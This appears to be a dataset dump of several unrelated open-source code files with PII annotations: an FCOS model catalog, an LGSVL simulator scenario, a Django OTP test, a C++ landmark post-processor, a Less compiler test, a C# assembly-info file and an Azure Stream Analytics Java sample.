factory="PascalVOCDataset",
args=args,
)
raise RuntimeError("Dataset not available: {}".format(name))
class ModelCatalog(object):
S3_C2_DETECTRON_URL = "https://dl.fbaipublicfiles.com/detectron"
C2_IMAGENET_MODELS = {
"MSRA/R-50": "ImageNetPretrained/MSRA/R-50.pkl",
"MSRA/R-50-GN": "ImageNetPretrained/47261647/R-50-GN.pkl",
"MSRA/R-101": "ImageNetPretrained/MSRA/R-101.pkl",
"MSRA/R-101-GN": "ImageNetPretrained/47592356/R-101-GN.pkl",
"FAIR/20171220/X-101-32x8d": "ImageNetPretrained/20171220/X-101-32x8d.pkl",
"FAIR/20171220/X-101-64x4d": "ImageNetPretrained/20171220/X-101-64x4d.pkl",
}
C2_DETECTRON_SUFFIX = "output/train/{}coco_2014_train%3A{}coco_2014_valminusminival/generalized_rcnn/model_final.pkl"
C2_DETECTRON_MODELS = {
"35857197/e2e_faster_rcnn_R-50-C4_1x": "01_33_49.iAX0mXvW",
"35857345/e2e_faster_rcnn_R-50-FPN_1x": "01_36_30.cUF7QR7I",
"35857890/e2e_faster_rcnn_R-101-FPN_1x": "01_38_50.sNxI7sX7",
"36761737/e2e_faster_rcnn_X-101-32x8d-FPN_1x": "06_31_39.5MIHi1fZ",
"35858791/e2e_mask_rcnn_R-50-C4_1x": "01_45_57.ZgkA7hPB",
"35858933/e2e_mask_rcnn_R-50-FPN_1x": "01_48_14.DzEQe4wC",
"35861795/e2e_mask_rcnn_R-101-FPN_1x": "02_31_37.KqyEK4tT",
"36761843/e2e_mask_rcnn_X-101-32x8d-FPN_1x": "06_35_59.RZotkLKI",
"37129812/e2e_mask_rcnn_X-152-32x8d-FPN-IN5k_1.44x": "09_35_36.8pzTQKYK",
# keypoints
"37697547/e2e_keypoint_rcnn_R-50-FPN_1x": "08_42_54.kdzV35ao"
}
@staticmethod
def get(name):
if name.startswith("Caffe2Detectron/COCO"):
return ModelCatalog.get_c2_detectron_12_2017_baselines(name)
if name.startswith("ImageNetPretrained"):
return ModelCatalog.get_c2_imagenet_pretrained(name)
raise RuntimeError("model not present in the catalog {}".format(name))
@staticmethod
def get_c2_imagenet_pretrained(name):
prefix = ModelCatalog.S3_C2_DETECTRON_URL
name = name[len("ImageNetPretrained/"):]
name = ModelCatalog.C2_IMAGENET_MODELS[name]
url = "/".join([prefix, name])
return url
@staticmethod
def get_c2_detectron_12_2017_baselines(name):
# Detectron C2 models are stored following the structure
# prefix/<model_id>/2012_2017_baselines/<model_name>.yaml.<signature>/suffix
# we use as identifiers in the catalog Caffe2Detectron/COCO/<model_id>/<model_name>
prefix = ModelCatalog.S3_C2_DETECTRON_URL
dataset_tag = "keypoints_" if "keypoint" in name else ""
suffix = ModelCatalog.C2_DETECTRON_SUFFIX.format(dataset_tag, dataset_tag)
# remove identification prefix
name = name[len("Caffe2Detectron/COCO/"):]
# split in <model_id> and <model_name>
model_id, model_name = name.split("/")
# parsing to make it match the url address from the Caffe2 models
model_name = "{}.yaml".format(model_name)
signature = ModelCatalog.C2_DETECTRON_MODELS[name]
unique_name = ".".join([model_name, signature])
url = "/".join([prefix, model_id, "12_2017_baselines", unique_name, suffix])
return url
|
Python
|
BSD-2-Clause
|
choasup/FCOS/fcos_core/config/paths_catalog.py
|
7de11895-15ad-4673-b987-65152080dda6
|
[]
|
[]
|
#!/usr/bin/env python3
#
# Copyright (c) 2019 LG Electronics, Inc.
#
# This software contains code licensed as described in LICENSE.
#
import os
import lgsvl
import random
import time
from pathlib import Path
import json
sim = lgsvl.Simulator(os.environ.get("SIMULATOR_HOST", "127.0.0.1"), 8181)
layer_mask = 0
layer_mask |= 1 << 0 # 0 is the layer for the road (default)
if sim.current_scene == "SanFrancisco":
sim.reset()
else:
sim.load("SanFrancisco")
# if sim.current_scene == "Testbed":
# sim.reset()
# else:
# sim.load("Testbed")
spawns = sim.get_spawn()
spawns[0].position.x = 705.6
spawns[0].position.y = 10.1
spawns[0].position.z = -308.7
spawns[0].rotation.y -= 95
forward = lgsvl.utils.transform_to_forward(spawns[0])
right = lgsvl.utils.transform_to_right(spawns[0])
state = lgsvl.AgentState()
# state.transform.position = spawns[0].position
state.transform.position = spawns[0].position
state.transform.rotation = spawns[0].rotation
ego = sim.add_agent("SingleLiDAR (Autoware)", lgsvl.AgentType.EGO, state)
ego.connect_bridge(os.environ.get("BRIDGE_HOST", "127.0.0.1"), 9090)
#------- Stand vehicle -------#
#set stand vehicle's initial position
pose_arr = [
(-3, 5),
(-3, 10),
(-3, 15),
(-3, 20),
(-5, 25),
(3, 30),
(-1, 40),
(-6, 33)
]
sv_state_arr = []
for (x, y) in pose_arr:
sv_state_arr.append(lgsvl.AgentState())
sv_state_arr[-1].transform.position = spawns[0].position + y * forward + x * right
sv_state_arr[-1].transform.rotation = spawns[0].rotation
_ = sim.add_agent("Sedan", lgsvl.AgentType.NPC, sv_state_arr[-1])
# for i in range(30):
# sv_state_arr.append(lgsvl.AgentState())
# sv_state_arr[-1].transform.position = spawns[0].position + (150 + i * 7) * forward + 3.5 * right
# sv_state_arr[-1].transform.rotation = spawns[0].rotation
# _ = sim.add_agent("Sedan", lgsvl.AgentType.NPC, sv_state_arr[-1])
# for i in range(30):
# sv_state_arr.append(lgsvl.AgentState())
# sv_state_arr[-1].transform.position = spawns[0].position + (150 + i * 7) * forward - 6 * right
# sv_state_arr[-1].transform.rotation = spawns[0].rotation
# _ = sim.add_agent("Sedan", lgsvl.AgentType.NPC, sv_state_arr[-1])
sim.run()
|
Python
|
MIT
|
rubis-lab/Autoware_NDT/autoware.ai/autoware_files/lgsvl_file/scripts/testbed_scenario/sanfrancisco.py
|
06f8e4e5-9395-407b-a644-4ea5e776143e
|
[{"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 279, "end": 288, "context": "lgsvl.Simulator(os.environ.get(\"SIMULATOR_HOST\", \"127.0.0.1\"), 8181)\n\nlayer_mask = 0\nlayer_mask |= 1 << 0 # "}, {"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 1089, "end": 1098, "context": "ego.connect_bridge(os.environ.get(\"BRIDGE_HOST\", \"127.0.0.1\"), 9090)\n\n\n#------- Stand vehicle -------#\n#set s"}]
|
[{"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 279, "end": 288, "context": "lgsvl.Simulator(os.environ.get(\"SIMULATOR_HOST\", \"127.0.0.1\"), 8181)\n\nlayer_mask = 0\nlayer_mask |= 1 << 0 # "}, {"tag": "IP_ADDRESS", "value": "127.0.0.1", "start": 1089, "end": 1098, "context": "ego.connect_bridge(os.environ.get(\"BRIDGE_HOST\", \"127.0.0.1\"), 9090)\n\n\n#------- Stand vehicle -------#\n#set s"}]
|
from datetime import timedelta
import pytest
from django.utils import timezone
from electeez_auth.models import User
@pytest.mark.django_db
def test_otp(client):
user = User.objects.create(email='otp@example.com')
token = user.otp_new(redirect='valid')
response = client.post(token.path)
assert response['Location'] == 'valid'
# can't use the link twice
response = client.post(token.path)
assert response['Location'] != 'valid'
# try expired link
token = user.otp_new()
token.otp_expiry = timezone.now() - timedelta(minutes=1)
token.save()
response = client.post(token.path)
assert response['Location'] != 'valid'
|
Python
|
MIT
|
Joneswn/Baloti/electeez_auth/test_otp.py
|
3b26d026-e755-420c-8b6b-4b0c157cd142
|
[]
|
[]
|
/**
* Copyright (c) 2019 Horizon Robotics. All rights reserved.
* @File: LmkPosePostPredictor.cpp
* @Brief: definition of the LmkPosePostPredictor
* @Author: zhengzheng.ge
* @Email: zhengzheng.ge@horizon.ai
* @Date: 2019-07-17 14:27:05
* @Last Modified by: zhengzheng.ge
* @Last Modified time: 2019-07-17 15:18:10
*/
#include "CNNMethod/PostPredictor/LmkPosePostPredictor.h"
#include <vector>
#include "CNNMethod/CNNConst.h"
#include "CNNMethod/util/util.h"
#include "hobotlog/hobotlog.hpp"
#include "hobotxstream/profiler.h"
namespace xstream {
void LmkPosePostPredictor::Do(CNNMethodRunData *run_data) {
int batch_size = run_data->input_dim_size.size();
run_data->output.resize(batch_size);
for (int batch_idx = 0; batch_idx < batch_size; batch_idx++) {
int dim_size = run_data->input_dim_size[batch_idx];
auto &mxnet_output = run_data->mxnet_output[batch_idx];
std::vector<BaseDataPtr> &batch_output = run_data->output[batch_idx];
batch_output.resize(output_slot_size_);
for (int i = 0; i < output_slot_size_; i++) {
auto base_data_vector = std::make_shared<BaseDataVector>();
batch_output[i] = std::static_pointer_cast<BaseData>(base_data_vector);
}
{
RUN_PROCESS_TIME_PROFILER(model_name_ + "_post");
RUN_FPS_PROFILER(model_name_ + "_post");
auto boxes = std::static_pointer_cast<BaseDataVector>(
(*(run_data->input))[batch_idx][0]);
for (int dim_idx = 0; dim_idx < dim_size; dim_idx++) {
std::vector<BaseDataPtr> output;
auto xstream_box = std::static_pointer_cast<XStreamData<
hobot::vision::BBox>>(boxes->datas_[dim_idx]);
HandleLmkPose(mxnet_output[dim_idx], xstream_box->value,
run_data->real_nhwc, &output);
for (int i = 0; i < output_slot_size_; i++) {
auto base_data_vector =
std::static_pointer_cast<BaseDataVector>(batch_output[i]);
base_data_vector->datas_.push_back(output[i]);
}
}
}
}
}
void LmkPosePostPredictor::HandleLmkPose(
const std::vector<std::vector<int8_t>> &mxnet_outs,
const hobot::vision::BBox &box,
const std::vector<std::vector<uint32_t>> &nhwc,
std::vector<BaseDataPtr> *output) {
if (mxnet_outs.size()) {
auto lmk = LmkPostPro(mxnet_outs, box, nhwc);
output->push_back(lmk);
if (mxnet_outs.size() > 3) {
auto pose = PosePostPro(mxnet_outs[3]);
output->push_back(pose);
} else {
auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
pose->state_ = DataState::INVALID;
output->push_back(std::static_pointer_cast<BaseData>(pose));
}
} else {
auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
landmarks->state_ = DataState::INVALID;
output->push_back(std::static_pointer_cast<BaseData>(landmarks));
auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
pose->state_ = DataState::INVALID;
output->push_back(std::static_pointer_cast<BaseData>(pose));
}
}
BaseDataPtr LmkPosePostPredictor::LmkPostPro(
const std::vector<std::vector<int8_t>> &mxnet_outs,
const hobot::vision::BBox &box,
const std::vector<std::vector<uint32_t>> &nhwc) {
static const float SCORE_THRESH = 0.0;
static const float REGRESSION_RADIUS = 3.0;
static const float STRIDE = 4.0;
static const float num = 1;
static const float height_m = 16;
static const float width_m = 16;
auto fl_scores = reinterpret_cast<const float *>(mxnet_outs[0].data());
auto fl_coords = reinterpret_cast<const float *>(mxnet_outs[1].data());
std::vector<std::vector<float>> points_score;
std::vector<std::vector<float>> points_x;
std::vector<std::vector<float>> points_y;
points_score.resize(5);
points_x.resize(5);
points_y.resize(5);
// nhwc, 1x16x16x5, 1x16x16x10
for (int n = 0; n < num; ++n) { // n
for (int i = 0; i < height_m; ++i) { // h
for (int j = 0; j < width_m; ++j) { // w
int index_score = n * nhwc[0][1] * nhwc[0][2] * nhwc[0][3] +
i * nhwc[0][2] * nhwc[0][3] + j * nhwc[0][3];
int index_coords = n * nhwc[1][1] * nhwc[1][2] * nhwc[0][3] +
i * nhwc[1][2] * nhwc[1][3] + j * nhwc[1][3];
for (int k = 0; k < 5; ++k) { // c
auto score = fl_scores[index_score + k];
if (score > SCORE_THRESH) {
points_score[k].push_back(score);
float x = (j + 0.5 -
fl_coords[index_coords + 2 * k] * REGRESSION_RADIUS) *
STRIDE;
float y =
(i + 0.5 -
fl_coords[index_coords + 2 * k + 1] * REGRESSION_RADIUS) *
STRIDE;
x = std::min(std::max(x, 0.0f), width_m * STRIDE);
y = std::min(std::max(y, 0.0f), height_m * STRIDE);
points_x[k].push_back(x);
points_y[k].push_back(y);
}
}
}
}
}
auto landmarks = std::make_shared<XStreamData<hobot::vision::Landmarks>>();
landmarks->value.values.resize(5);
for (int i = 0; i < 5; ++i) {
auto &poi = landmarks->value.values[i];
poi.x = Mean(points_x[i]);
poi.y = Mean(points_y[i]);
poi.x = box.x1 + poi.x / 64 * (box.x2 - box.x1);
poi.y = box.y1 + poi.y / 64 * (box.y2 - box.y1);
poi.score = static_cast<float>(points_score[i].size());
if (poi.score <= 0.000001 && mxnet_outs.size() > 2) {
auto reg_coords = reinterpret_cast<const float *>(mxnet_outs[2].data());
poi.x = box.x1 + reg_coords[i << 1] * (box.x2 - box.x1);
poi.y = box.y1 + reg_coords[(i << 1) + 1] * (box.y2 - box.y1);
}
}
return std::static_pointer_cast<BaseData>(landmarks);
}
BaseDataPtr LmkPosePostPredictor::PosePostPro(
const std::vector<int8_t> &mxnet_outs) {
auto pose = std::make_shared<XStreamData<hobot::vision::Pose3D>>();
auto mxnet_out = reinterpret_cast<const float *>(mxnet_outs.data());
pose->value.yaw = mxnet_out[0] * 90.0;
pose->value.pitch = mxnet_out[1] * 90.0;
pose->value.roll = mxnet_out[2] * 90.0;
return std::static_pointer_cast<BaseData>(pose);
}
} // namespace xstream
|
C++
|
BSD-2-Clause
|
robort-yuan/AI-EXPRESS/source/common/xstream/methods/cnnmethod/src/PostPredictor/LmkPosePostPredictor.cpp
|
42452bcf-d929-4113-a274-1add744b7985
|
[{"tag": "EMAIL", "value": "zhengzheng.ge@horizon.ai", "start": 187, "end": 211, "context": "ostPredictor\n * @Author: zhengzheng.ge\n * @Email: zhengzheng.ge@horizon.ai\n * @Date: 2019-07-17 14:27:05\n * @Last Modified b"}]
|
[{"tag": "EMAIL", "value": "zhengzheng.ge@horizon.ai", "start": 187, "end": 211, "context": "ostPredictor\n * @Author: zhengzheng.ge\n * @Email: zhengzheng.ge@horizon.ai\n * @Date: 2019-07-17 14:27:05\n * @Last Modified b"}]
|
/*
* Copyright 2011 <a href="mailto:lincolnbaxter@gmail.com">Lincoln Baxter, III</a>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.ocpsoft.rewrite.transform.less;
import static org.junit.Assert.assertEquals;
import org.junit.Test;
import org.ocpsoft.rewrite.transform.less.Less;
public class LessTest
{
@Test
public void testCalculation()
{
String input = ".class { width: 1 + 1 }";
String output = Less.compiler().transform(null, input);
assertSameCSS(".class { width: 2; }", output);
}
@Test
public void testVariables()
{
String input = "@nice-blue: #5B83AD;\n.myblue{ color: @nice-blue; }";
String output = Less.compiler().transform(null, input);
assertSameCSS(".myblue { color: #5B83AD; }", output);
}
@Test
public void testMixins()
{
String input = ".bordered { border: 1px solid red; }\n.navigation { .bordered }\n";
String output = Less.compiler().transform(null, input);
assertSameCSS(".bordered{ border: 1px solid red; }\n.navigation{ border: 1px solid red; }\n", output);
}
private static void assertSameCSS(String expected, String actual)
{
assertEquals(normalize(expected), normalize(actual));
}
private static String normalize(String s)
{
return s.toLowerCase().replaceAll("\\s+", "");
}
}
|
Java
|
Apache-2.0
|
Tobisaninfo/rewrite/transform-less/src/test/java/org/ocpsoft/rewrite/transform/less/LessTest.java
|
f704423d-7e72-4327-a96a-eb41dbcd0270
|
[{"tag": "NAME", "value": "Lincoln Baxter", "start": 62, "end": 76, "context": "ght 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under the Apache License"}, {"tag": "EMAIL", "value": "lincolnbaxter@gmail.com", "start": 37, "end": 60, "context": "/*\n * Copyright 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under th"}]
|
[{"tag": "NAME", "value": "Lincoln Baxter", "start": 62, "end": 76, "context": "ght 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under the Apache License"}, {"tag": "EMAIL", "value": "lincolnbaxter@gmail.com", "start": 37, "end": 60, "context": "/*\n * Copyright 2011 <a href=\"mailto:lincolnbaxter@gmail.com\">Lincoln Baxter, III</a>\n * \n * Licensed under th"}]
|
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
using System;
using System.Reflection;
[assembly: System.Reflection.AssemblyCompanyAttribute("CorporateUniversityLibrary")]
[assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")]
[assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")]
[assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")]
[assembly: System.Reflection.AssemblyProductAttribute("CorporateUniversityLibrary")]
[assembly: System.Reflection.AssemblyTitleAttribute("CorporateUniversityLibrary")]
[assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")]
// Generated by the MSBuild WriteCodeFragment class.
|
C#
|
MIT
|
Krishna143-cog/DotNETSamples/CorporateUniversity/CorporateUniversityLibrary/obj/Debug/netstandard2.0/CorporateUniversityLibrary.AssemblyInfo.cs
|
c93fcf73-d78e-4b75-bae0-dec60cf37ee8
|
[]
|
[]
|
Read the [SDK documentation](https://github.com/Azure/azure-sdk-for-java/blob/azure-resourcemanager-streamanalytics_1.0.0-beta.2/sdk/streamanalytics/azure-resourcemanager-streamanalytics/README.md) on how to add the SDK to your project and authenticate.
```java
import com.azure.resourcemanager.streamanalytics.models.ClusterSku;
import com.azure.resourcemanager.streamanalytics.models.ClusterSkuName;
import java.util.HashMap;
import java.util.Map;
/** Samples for Clusters CreateOrUpdate. */
public final class Main {
/*
* x-ms-original-file: specification/streamanalytics/resource-manager/Microsoft.StreamAnalytics/stable/2020-03-01/examples/Cluster_Create.json
*/
/**
* Sample code: Create a new cluster.
*
* @param manager Entry point to StreamAnalyticsManager.
*/
public static void createANewCluster(com.azure.resourcemanager.streamanalytics.StreamAnalyticsManager manager) {
manager
.clusters()
.define("An Example Cluster")
.withRegion("North US")
.withExistingResourceGroup("sjrg")
.withTags(mapOf("key", "value"))
.withSku(new ClusterSku().withName(ClusterSkuName.DEFAULT).withCapacity(48))
.create();
}
@SuppressWarnings("unchecked")
private static <T> Map<String, T> mapOf(Object... inputs) {
Map<String, T> map = new HashMap<>();
for (int i = 0; i < inputs.length; i += 2) {
String key = (String) inputs[i];
T value = (T) inputs[i + 1];
map.put(key, value);
}
return map;
}
}
```
|
Markdown
|
MIT
|
Azure/azure-rest-api-specs-examples/specification/streamanalytics/resource-manager/Microsoft.StreamAnalytics/stable/2020-03-01/examples-java/Cluster_Create.md
|
c0a453f3-322c-4864-ae20-f29ff2e9ddc5
|
[]
|
[]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.